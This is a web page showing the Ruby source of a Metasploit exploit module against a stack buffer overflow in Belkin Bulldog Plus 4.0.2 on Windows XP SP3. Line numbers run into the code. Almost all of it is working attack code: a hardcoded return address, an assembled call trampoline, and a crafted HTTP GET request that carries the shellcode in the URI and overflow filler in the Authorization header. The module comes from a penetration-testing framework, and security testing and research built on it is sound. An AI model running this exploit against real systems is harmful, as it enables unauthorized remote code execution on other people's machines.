Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/belkin_bulldog.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(update_info(info,12'Name' => 'Belkin Bulldog Plus Web Service Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in Belkin Bulldog Plus154.0.2 build 1219. When sending a specially crafted http request,16an attacker may be able to execute arbitrary code.17},18'Author' => [ 'MC' ],19'License' => MSF_LICENSE,20'References' =>21[22[ 'OSVDB', '54395' ],23[ 'BID', '34033' ],24[ 'EDB', '8173' ]25],26'Privileged' => true,27'DefaultOptions' =>28{29'EXITFUNC' => 'process',30'AllowWin32SEH' => true31},32'Payload' =>33{34'Space' => 750,35'BadChars' => "\x00",36'StackAdjustment' => -3500,37'EncoderType' => Msf::Encoder::Type::AlphanumUpper,38'DisableNops' => 'True',39},40'Platform' => 'win',41'Targets' =>42[43[ 'Windows XP SP3 English', { 'Ret' => 0x7e4456f7 } ],44],45'DefaultTarget' => 0,46'DisclosureDate' => '2009-03-08'))47end4849def exploit50c = connect5152dwerd = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call dword [esp+58h]").encode_string5354filler = [target.ret].pack('V') + dwerd + make_nops(28)5556print_status("Trying target #{target.name}...")5758send_request_raw({59'uri' => payload.encoded,60'version' => '1.1',61'method' => 'GET',62'headers' =>63{64'Authorization' => "Basic #{Rex::Text.encode_base64(filler)}"65}66}, 5)6768handler69end70end717273